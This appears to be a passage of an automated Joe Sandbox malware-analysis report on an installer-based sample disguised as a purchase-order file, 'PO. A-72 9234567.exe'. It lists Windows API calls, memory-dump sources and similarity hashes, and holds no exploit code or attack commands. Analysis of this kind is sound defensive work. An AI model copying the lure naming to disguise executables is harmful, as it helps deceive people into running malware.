                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                Function 0040467F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                                • GetSysColor.USER32(?), ref: 0040475F
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                • lstrlenW.KERNEL32(?), ref: 00404780
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                • SendMessageW.USER32(00000000), ref: 00404802
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                • SetCursor.USER32(00000000), ref: 00404881
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                • SetCursor.USER32(00000000), ref: 0040489D
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: : Completed$N
                                                • API String ID: 3103080414-2140067464
                                                • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                Function 00406187 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                  • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                  • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                • wsprintfA.USER32 ref: 00406206
                                                • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                  • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                  • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                Function 004067EF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO. A-72 9234567.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                • CharNextW.USER32(?,"C:\Users\user\Desktop\PO. A-72 9234567.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                Strings
                                                • *?|<>/":, xrefs: 00406841
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0
                                                • "C:\Users\user\Desktop\PO. A-72 9234567.exe", xrefs: 00406833
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\PO. A-72 9234567.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-3956099628
                                                • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                Function 00404527 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                • GetSysColor.USER32(00000000), ref: 00404582
                                                • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                • SetBkMode.GDI32(?,?), ref: 0040459A
                                                • GetSysColor.USER32(?), ref: 004045AD
                                                • SetBkColor.GDI32(?,?), ref: 004045BD
                                                • DeleteObject.GDI32(?), ref: 004045D7
                                                • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                  • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                                • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                                Function 00404E7B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                • GetMessagePos.USER32 ref: 00404E9E
                                                • ScreenToClient.USER32(?,?), ref: 00404EB8
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                Function 00401E73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(?), ref: 00401E76
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID: Calibri
                                                • API String ID: 3808545654-1409258342
                                                • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                • MulDiv.KERNEL32(000C2EF6,00000064,000C30FA), ref: 00403001
                                                • wsprintfW.USER32 ref: 00403011
                                                • SetWindowTextW.USER32(?,?), ref: 00403021
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                Strings
                                                • verifying installer: %d%%, xrefs: 0040300B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
